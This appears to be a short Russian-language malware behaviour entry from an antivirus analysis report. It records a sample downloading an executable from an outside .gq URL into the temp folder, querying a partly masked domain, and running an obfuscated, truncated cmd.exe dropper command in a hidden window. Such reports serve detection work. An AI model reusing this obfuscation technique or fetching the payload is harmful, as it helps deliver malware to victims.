Техническая информация
- http://zentacher.gq/nexus.exe как %temp + %\rising.exe
- '<SYSTEM32>\cmd.exe' \v:ON \c"set dry= && set microsoft=F9.T'MQ;iYPZeUB3 RWDyhX2k7,qE4jHglGd0uc%Sx$tL865aIfO\:-+w~rvKnbJ1A=VNm\sC_)(po@z && for %H in (76,77,56,12,58,71,21,12,33,33,2,12,41,12,16,54,56,16,21,8,35,35...
- DNS ASK ze###cher.gq
- '<SYSTEM32>\cmd.exe' \v:ON \c"set dry= && set microsoft=F9.T'MQ;iYPZeUB3 RWDyhX2k7,qE4jHglGd0uc%Sx$tL865aIfO\:-+w~rvKnbJ1A=VNm\sC_)(po@z && for %H in (76,77,56,12,58,71,21,12,33,33,2,12,41,12,16,54,56,16,21,8,35,35... (со скрытым окном)